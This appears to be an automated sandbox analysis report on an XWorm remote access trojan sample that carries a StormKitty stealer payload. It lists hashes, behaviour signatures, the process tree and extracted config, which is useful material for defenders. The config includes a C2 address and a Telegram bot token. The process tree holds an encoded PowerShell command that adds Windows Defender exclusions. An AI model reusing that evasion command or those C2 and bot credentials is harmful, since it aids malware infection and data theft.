Analysis

  • max time kernel
    120s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-10-2024 22:21

General

  • Target

    1b99f0bf9216a89b8320e63cbd18a292.exe

  • Size

    1.3MB

  • MD5

    1b99f0bf9216a89b8320e63cbd18a292

  • SHA1

    6a199cb43cb4f808183918ddb6eadc760f7cb680

  • SHA256

    5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357

  • SHA512

    02b7f410c6ccfd7d43159287424916a310b7e82c91cdb85eaeade16cf5614265a8bdcce8e6dcc2240ea54930cfb190f26ada3d5c926b50617a9826197f9cf382

  • SSDEEP

    24576:J64p16BppRskYGC/cJUE7P6nxhpBaTn+CC6YtGz:JzpEBrRb4MonrpATDcUz

Malware Config

Extracted

Family

xworm

Version

5.0

C2

104.219.239.11:6969

Mutex

QMHDjhLW52nOcp4a

Attributes
  • Install_directory

    %AppData%

  • install_file

    OneDrive.exe

  • telegram

    https://api.telegram.org/bot5372344229:AAEM46DF5hWBLPbN5UErJaoJvlNvm-ZJXyg

aes.plain

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Detect Xworm Payload 3 IoCs
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1b99f0bf9216a89b8320e63cbd18a292.exe
    "C:\Users\Admin\AppData\Local\Temp\1b99f0bf9216a89b8320e63cbd18a292.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1812
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQBiADkAOQBmADAAYgBmADkAMgAxADYAYQA4ADkAYgA4ADMAMgAwAGUANgAzAGMAYgBkADEAOABhADIAOQAyAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADEAYgA5ADkAZgAwAGIAZgA5ADIAMQA2AGEAOAA5AGIAOAAzADIAMABlADYAMwBjAGIAZAAxADgAYQAyADkAMgAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4744
    • C:\Users\Admin\AppData\Local\Temp\advgov.exe
      "C:\Users\Admin\AppData\Local\Temp\advgov.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:5096

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\advgov.exe

    Filesize

    146KB

    MD5

    34fb99630bab94b3cbf92c1c6dec493f

    SHA1

    d6cc3d729e7971f7144f902d482f723ddd77cad8

    SHA256

    f2e2e2e4b066e98a05012853f4fabf37e04b9c5dc18d8341cc98b145f9a7f12a

    SHA512

    62bfc6a7fb0d895907da815859e7d118b16de33111210443a745b0cb9d11db82bd0531efef8503266c1269a037153794ea52bc2ce70a127389fce0e5ac4d9fcf

  • memory/1812-0-0x000007FEF5C53000-0x000007FEF5C54000-memory.dmp

    Filesize

    4KB

  • memory/1812-1-0x0000000001110000-0x000000000125A000-memory.dmp

    Filesize

    1.3MB

  • memory/1812-2-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

    Filesize

    9.9MB

  • memory/1812-3-0x000000001C1A0000-0x000000001C2A6000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-4-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-5-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-18-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-27-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-7-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-35-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-9-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-11-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-59-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-13-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-15-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-19-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-23-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-25-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-65-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-67-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-63-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-61-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-57-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-55-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-53-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-51-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-49-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-47-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-45-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-43-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-41-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-39-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-37-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-33-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-31-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-29-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-21-0x000000001C1A0000-0x000000001C2A1000-memory.dmp

    Filesize

    1.0MB

  • memory/1812-1078-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

    Filesize

    9.9MB

  • memory/1812-1079-0x00000000009B0000-0x0000000000A30000-memory.dmp

    Filesize

    512KB

  • memory/1812-1080-0x00000000008E0000-0x000000000092C000-memory.dmp

    Filesize

    304KB

  • memory/1812-1081-0x000007FEF5C53000-0x000007FEF5C54000-memory.dmp

    Filesize

    4KB

  • memory/1812-1082-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

    Filesize

    9.9MB

  • memory/1812-1084-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

    Filesize

    9.9MB

  • memory/1812-1091-0x00000000010C0000-0x0000000001114000-memory.dmp

    Filesize

    336KB

  • memory/1812-1095-0x00000000027D0000-0x00000000027FC000-memory.dmp

    Filesize

    176KB

  • memory/1812-1096-0x000007FEF5C50000-0x000007FEF663C000-memory.dmp

    Filesize

    9.9MB

  • memory/1812-1098-0x0000000002800000-0x000000000280E000-memory.dmp

    Filesize

    56KB

  • memory/1812-1104-0x00000000202F0000-0x0000000020410000-memory.dmp

    Filesize

    1.1MB

  • memory/4744-1089-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

  • memory/4744-1090-0x0000000002920000-0x0000000002928000-memory.dmp

    Filesize

    32KB

  • memory/5096-1103-0x0000000000E00000-0x0000000000E2A000-memory.dmp

    Filesize

    168KB